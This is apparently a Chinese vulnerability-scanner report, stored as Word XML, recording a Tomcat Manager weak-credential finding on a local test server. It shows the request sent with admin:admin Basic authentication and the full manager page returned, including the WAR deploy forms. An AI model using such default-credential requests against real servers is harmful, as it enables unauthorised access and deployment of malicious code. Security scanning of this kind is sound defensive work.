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tomcat存在tomcat漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>	http://127.0.0.1:8081
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>
漏洞详情：
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>一共1组payload:
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>第1组payload共发送1次请求:
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t>发送第1次请求:
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求数据包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>GET /manager/html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: 127.0.0.1:8081
Authorization: Basic YWRtaW46YWRtaW4=
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求响应包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK
Date: Thu, 02 Mar 2023 01:42:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17460
Cache-Control: private
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Set-Cookie: JSESSIONID=3A5521A9BBE27EDE0ADBAD962D0551F3; Path=/manager; HttpOnly; SameSite=Strict
&lt;html&gt;
&lt;head&gt;
&lt;link rel="stylesheet" href="/manager/css/manager.css"&gt;
&lt;title&gt;/manager&lt;/title&gt;
&lt;/head&gt;
&lt;body bgcolor="#FFFFFF"&gt;
&lt;table cellspacing="4" border="0"&gt;
 &lt;tr&gt;
  &lt;td colspan="2"&gt;
   &lt;a href="https://tomcat.apache.org/" rel="noopener noreferrer"&gt;
    &lt;img class=tomcat-logo alt="The Tomcat Servlet/JSP Container"
         src="/manager/images/tomcat.svg"&gt;
   &lt;/a&gt;
   &lt;a href="https://www.apache.org/" rel="noopener noreferrer"&gt;
    &lt;img border="0" alt="The Apache Software Foundation" align="right"
         src="/manager/images/asf-logo.svg" style="width: 266px; height: 83px;"&gt;
   &lt;/a&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
&lt;/table&gt;
&lt;hr size="1" noshade="noshade"&gt;
&lt;table cellspacing="4" border="0"&gt;
 &lt;tr&gt;
  &lt;td class="page-title" bordercolor="#000000" align="left" nowrap&gt;
   &lt;font size="+2"&gt;Tomcat Web应用程序管理者&lt;/font&gt;
  &lt;/td&gt;
 &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
 &lt;tr&gt;
  &lt;td class="row-left" width="10%"&gt;&lt;small&gt;&lt;strong&gt;消息：&lt;/strong&gt;&lt;/small&gt;&amp;nbsp;&lt;/td&gt;
  &lt;td class="row-left"&gt;&lt;pre&gt;OK&lt;/pre&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="4" class="title"&gt;管理器&lt;/td&gt;
&lt;/tr&gt;
 &lt;tr&gt;
  &lt;td class="row-left"&gt;&lt;a href="/manager/html/list;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;应用程序列表&lt;/a&gt;&lt;/td&gt;
  &lt;td class="row-center"&gt;&lt;a href="/manager/../docs/html-manager-howto.html" rel="noopener noreferrer"&gt;HTML管理器帮助&lt;/a&gt;&lt;/td&gt;
  &lt;td class="row-center"&gt;&lt;a href="/manager/../docs/manager-howto.html" rel="noopener noreferrer"&gt;管理者帮助&lt;/a&gt;&lt;/td&gt;
  &lt;td class="row-right"&gt;&lt;a href="/manager/status;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;服务器状态&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="6" class="title"&gt;应用程序&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="header-left"&gt;&lt;small&gt;路径&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-left"&gt;&lt;small&gt;版本号&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;显示.名称&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;运行中&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-left"&gt;&lt;small&gt;会话&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-left"&gt;&lt;small&gt;命令&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="/" rel="noopener noreferrer"&gt;&amp;#47;&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;i&gt;未指定&lt;/i&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;Welcome to Tomcat&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;true&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="&amp;#47;manager&amp;#47;html&amp;#47;sessions;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;0&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &amp;nbsp;&lt;small&gt;启动&lt;/small&gt;&amp;nbsp;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;stop;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="停止"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;reload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="重新加载"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;undeploy;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &amp;nbsp;&amp;nbsp;&lt;small&gt;&lt;input type="submit" value="卸载"&gt;&lt;/small&gt;  &lt;/form&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &lt;form method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;expire;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;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bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;a href="/docs/" rel="noopener noreferrer"&gt;&amp;#47;docs&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;i&gt;未指定&lt;/i&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;Tomcat Documentation&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;true&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;a href="&amp;#47;manager&amp;#47;html&amp;#47;sessions;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;docs&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;0&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3"&gt;
  &amp;nbsp;&lt;small&gt;启动&lt;/small&gt;&amp;nbsp;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;stop;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;docs&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="停止"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;reload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;docs&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="重新加载"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;undeploy;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;docs&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &amp;nbsp;&amp;nbsp;&lt;small&gt;&lt;input type="submit" value="卸载"&gt;&lt;/small&gt;  &lt;/form&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3"&gt;
  &lt;form method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;expire;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;docs&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;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bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="/examples/" rel="noopener noreferrer"&gt;&amp;#47;examples&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;i&gt;未指定&lt;/i&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;Servlet and JSP Examples&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;true&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="&amp;#47;manager&amp;#47;html&amp;#47;sessions;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;examples&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;0&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &amp;nbsp;&lt;small&gt;启动&lt;/small&gt;&amp;nbsp;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;stop;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;examples&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="停止"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;reload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;examples&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="重新加载"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;undeploy;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;examples&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &amp;nbsp;&amp;nbsp;&lt;small&gt;&lt;input type="submit" value="卸载"&gt;&lt;/small&gt;  &lt;/form&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &lt;form method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;expire;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;examples&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;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bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;a href="/host-manager/" rel="noopener noreferrer"&gt;&amp;#47;host-manager&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;i&gt;未指定&lt;/i&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;Tomcat Host Manager Application&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;true&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#C3F3C3" rowspan="2"&gt;&lt;small&gt;&lt;a href="&amp;#47;manager&amp;#47;html&amp;#47;sessions;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;host-manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;0&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3"&gt;
  &amp;nbsp;&lt;small&gt;启动&lt;/small&gt;&amp;nbsp;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;stop;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;host-manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="停止"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;reload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;host-manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &lt;small&gt;&lt;input type="submit" value="重新加载"&gt;&lt;/small&gt;  &lt;/form&gt;
  &lt;form class="inline" method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;undeploy;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;host-manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;  &amp;nbsp;&amp;nbsp;&lt;small&gt;&lt;input type="submit" value="卸载"&gt;&lt;/small&gt;  &lt;/form&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#C3F3C3"&gt;
  &lt;form method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;expire;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;host-manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
  &lt;small&gt;
  &amp;nbsp;&lt;input type="submit" value="过期会话"&gt;&amp;nbsp;闲置 &amp;ge;&amp;nbsp;&lt;input type="text" name="idle" size="5" value="30"&gt;&amp;nbsp;分钟&amp;nbsp;
  &lt;/small&gt;
  &lt;/form&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="/manager/" rel="noopener noreferrer"&gt;&amp;#47;manager&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;i&gt;未指定&lt;/i&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;Tomcat Manager Application&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;true&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center" bgcolor="#FFFFFF" rowspan="2"&gt;&lt;small&gt;&lt;a href="&amp;#47;manager&amp;#47;html&amp;#47;sessions;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;2&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &lt;small&gt;
  &amp;nbsp;启动&amp;nbsp;
  &amp;nbsp;停止&amp;nbsp;
  &amp;nbsp;重新加载&amp;nbsp;
  &amp;nbsp;卸载&amp;nbsp;
  &lt;/small&gt;
 &lt;/td&gt;
&lt;/tr&gt;&lt;tr&gt;
 &lt;td class="row-left" bgcolor="#FFFFFF"&gt;
  &lt;form method="POST" action="&amp;#47;manager&amp;#47;html&amp;#47;expire;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?path=&amp;#47;manager&amp;amp;org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
  &lt;small&gt;
  &amp;nbsp;&lt;input type="submit" value="过期会话"&gt;&amp;nbsp;闲置 &amp;ge;&amp;nbsp;&lt;input type="text" name="idle" size="5" value="30"&gt;&amp;nbsp;分钟&amp;nbsp;
  &lt;/small&gt;
  &lt;/form&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="title"&gt;部署&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="header-left"&gt;&lt;small&gt;服务器上.部署的目录或WAR文件&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2"&gt;
&lt;form method="post" action="/manager/html/deploy;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
&lt;table cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &lt;small&gt;Context Path (required):&lt;/small&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="text" name="deployPath" size="20"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &lt;small&gt;XML配置文件路径：&lt;/small&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="text" name="deployConfig" size="20"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &lt;small&gt;WAR文件或文件夹路径：&lt;/small&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="text" name="deployWar" size="40"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &amp;nbsp;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="submit" value="部署"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/form&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="header-left"&gt;&lt;small&gt;要部署的WAR文件&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2"&gt;
&lt;form method="post" action="/manager/html/upload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE" enctype="multipart/form-data"&gt;
&lt;table cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &lt;small&gt;选择要上传的WAR文件&lt;/small&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="file" name="deployWar" size="40"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &amp;nbsp;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="submit" value="部署"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/form&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="title"&gt;配置&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="header-left"&gt;&lt;small&gt;重新读取 TLS 配置文件&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2"&gt;
&lt;form method="post" action="/manager/html/sslReload;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
&lt;table cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &lt;small&gt;TLS 主机名字（可选)&lt;/small&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="text" name="tlsHostName" size="20"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-right"&gt;
  &amp;nbsp;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;input type="submit" value="重复读"&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/form&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="title"&gt;诊断&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="header-left"&gt;&lt;small&gt;检查Web应用程序是否在停止、重新加载或取消部署时导致内存泄漏&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left"&gt;
  &lt;form method="post" action="/manager/html/findleaks;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
   &lt;input type="submit" value="发现泄漏"&gt;
  &lt;/form&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;small&gt;诊断检查将触发完整的垃圾收集，在生产系统中使用时要格外小心。&lt;/small&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td colspan="2" class="header-left"&gt;&lt;small&gt;TLS连接器配置诊断&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left"&gt;
  &lt;form method="post" action="/manager/html/sslConnectorCiphers;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
   &lt;input type="submit" value="密码"&gt;
  &lt;/form&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;small&gt;列出每个配置好的TLS虚拟主机和密码。&lt;/small&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left"&gt;
  &lt;form method="post" action="/manager/html/sslConnectorCerts;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
   &lt;input type="submit" value="证书"&gt;
  &lt;/form&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;small&gt;列出已配置的TLS虚拟主机以及各自的证书链&lt;/small&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-left"&gt;
  &lt;form method="post" action="/manager/html/sslConnectorTrustedCerts;jsessionid=3A5521A9BBE27EDE0ADBAD962D0551F3?org.apache.catalina.filters.CSRF_NONCE=34174C86310CD57D9681C8BF5B2279DE"&gt;
   &lt;input type="submit" value="认证证书"&gt;
  &lt;/form&gt;
 &lt;/td&gt;
 &lt;td class="row-left"&gt;
  &lt;small&gt;列出每个配置好的TLS虚拟主机和认证证书。&lt;/small&gt;
 &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;&lt;table border="1" cellspacing="0" cellpadding="3"&gt;
&lt;tr&gt;
 &lt;td colspan="8" class="title"&gt;服务器信息&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;Tomcat.版本&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;JVM.版本&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;JVM提供商&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;OS.名称&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;操作系统版本&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;操作系统架构&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;主机名&lt;/small&gt;&lt;/td&gt;
 &lt;td class="header-center"&gt;&lt;small&gt;IP地址&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;Apache Tomcat/8.5.83&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;11.0.18+10-post-Ubuntu-0ubuntu120.04.1&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;Ubuntu&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;Linux&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;5.15.0-60-generic&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;amd64&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;qm&lt;/small&gt;&lt;/td&gt;
 &lt;td class="row-center"&gt;&lt;small&gt;127.0.1.1&lt;/small&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;hr size="1" noshade="noshade"&gt;
&lt;center&gt;&lt;font size="-1" color="#525D76"&gt;
 &lt;em&gt;Copyright &amp;copy; 1999-2022, Apache Software Foundation&lt;/em&gt;&lt;/font&gt;&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;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